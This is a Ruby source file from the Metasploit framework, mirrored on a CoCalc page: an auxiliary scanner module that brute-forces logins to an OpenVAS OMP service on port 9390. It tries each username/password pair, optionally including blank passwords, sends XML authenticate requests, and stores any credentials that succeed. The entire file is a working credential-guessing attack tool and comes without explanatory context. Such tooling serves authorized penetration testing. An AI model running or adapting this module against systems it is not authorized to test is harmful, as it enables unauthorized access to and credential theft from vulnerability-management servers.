CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Scanner8include Msf::Auxiliary::Report9include Msf::Auxiliary::AuthBrute1011def initialize12super(13'Name' => 'OpenVAS OMP Login Utility',14'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.',15'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],16'License' => MSF_LICENSE17)18register_options(19[20Opt::RPORT(9390),21OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])22]23)24end2526def run_host(ip)27begin28print_status("#{msg} Connecting and checking username and passwords")29each_user_pass do |user, pass|30do_login(user, pass)31end32rescue ::Rex::ConnectionError33rescue ::Exception => e34vprint_error("#{msg} #{e.to_s} #{e.backtrace}")35end36end3738def omp_send(data=nil, con=true)39begin40@result=''41@coderesult=''42if (con)43@connected=false44connect45select(nil,nil,nil,0.4)46end47@connected=true48sock.put(data)49@result=sock.get_once50rescue ::Exception => err51print_error("#{msg} Error: #{err.to_s}")52end53end5455def report_cred(opts)56service_data = {57address: opts[:ip],58port: opts[:port],59service_name: opts[:service_name],60protocol: 'tcp',61workspace_id: myworkspace_id62}6364credential_data = {65origin_type: :service,66module_fullname: fullname,67username: opts[:user],68private_data: opts[:password],69private_type: :password70}.merge(service_data)7172login_data = {73last_attempted_at: Time.now,74core: create_credential(credential_data),75status: Metasploit::Model::Login::Status::SUCCESSFUL,76proof: opts[:proof]77}.merge(service_data)7879create_credential_login(login_data)80end8182def do_login(user=nil,pass=nil)83begin84vprint_status("#{msg} Trying user:'#{user}' with password:'#{pass}'")85cmd = "<authenticate><credentials><username>#{user}</username><password>#{pass}</password></credentials></authenticate><HELP/>\r\n"86omp_send(cmd,true) # send hello87if @result =~ /<authenticate_response.*status="200"/is88print_good("#{msg} SUCCESSFUL login for '#{user}' : '#{pass}'")89report_cred(90ip: rhost,91port: rport,92service_name: 'openvas-omp',93user: user,94password: pass,95proof: @result96)97disconnect98@connected = false99return :next_user100else101if (@connected)102disconnect # Sometime openvas disconnect the client after wrongs attempts103@connected = false104end105vprint_error("#{msg} Rejected user: '#{user}' with password: '#{pass}': #{@result}")106return :fail107end108rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout109rescue ::Timeout::Error, ::Errno::EPIPE110end111end112113def msg114"#{rhost}:#{rport} OpenVAS OMP -"115end116end117118119